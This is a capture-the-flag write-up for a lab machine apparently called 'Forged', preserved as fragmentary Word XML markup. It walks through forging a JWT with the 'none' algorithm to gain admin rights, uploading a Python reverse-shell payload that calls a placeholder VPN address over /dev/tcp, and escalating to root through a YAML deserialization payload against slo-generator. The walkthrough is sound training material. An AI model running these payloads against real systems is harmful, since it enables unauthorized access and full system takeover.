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FORGED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evfo6xvvya6g"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qzzpwtnxupe6"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625600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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ezyz03fvdhcq"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br w:type="textWrapping"/>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80 - HTTP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>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looking at the website running on port 80:</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register a new account:</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6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a new account and logging in, we gain access to the dashboard.</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6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attempting to create a new project, we receive the following message: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5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analyze the token that was generated when logging in:</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4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website below, we can better analyze this token, and we can notice that the property </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is_admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is set to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">false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94100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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forge a new token by leaving the algorithm field empty (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">none algorithm</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Many times, developers build applications but do not update dependencies/libraries because the update process may break the existing application or they are unaware of the consequences that may occur due to this.</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begin by decoding this token in order to forge a new one.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 will decode the first part (header) and leave the algorithm field empty. After that, I will encode it in Base64.</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6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 the same in the payload section by modifying the property </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is_admin</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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">true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6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we can combine the two parts (header + payload) and replace our original token with this new forged token:</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eyJ0eXAiOiJKV1QiLCJhbGciOiIifQ==.eyJ1c2VyIjoiam9obiIsImlzX2FkbWluIjp0cnVlLCJleHBpcmF0aW9uIjoiMjAyMi0xMC0wNCAxNzowMzozNC41NzMzNTMifQ==.</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access to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">new-project</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> feature, since we are admin.</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7900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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upload a Python file that will be executed on the server. Below, we have a hint that it is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sandbox</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so it is likely using the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5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create a payload that will return a shell:</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__import__("os").popen("/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/4444 0&gt;&amp;1'").read()</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6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6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file containing the payload, we receive the reverse connection (shell).</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5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7bd8r16nt3mm" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>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1qz3rk5hpsth" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>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6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find our first flag.</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30300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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notice that we have permission to execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">slo-generator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with root privileges without needing to provide the password.</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6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slo-generator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a tool used to calculate and export </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Service Level Objectives (SLOs)</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Error Budgets</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Burn Rates</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, using configurations written in YAML (or JSON) format.</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searching for this tool, we find an exploit available on exploit-db that allows command execution on the system.</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create a payload that will return a root shell:</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!!python/object/apply:os.system ["bash"]</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0" l="0" r="0" t="0"/>
            <wp:docPr id="5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retrieve the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0" l="0" r="0" t="0"/>
            <wp:docPr id="5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5"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Forged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1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5.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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9.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.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cHCApJwoNfav83Fvy9QHh7hyA==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmV2Zm82eHZ2eWE2ZzIOaC5xenpwd3RueHVwZTYyDmguZXp5ejAzZnZkaGNxMg5oLjdiZDhyMTZudDNtbTIOaC4xcXozcms1aHBzdGgyDmguMTc1ZjVjczk0ejBvOAByITFaYll6SG0xTmY4aHZGT1lpRFNGT09LTmxKTjJMR1g2eA==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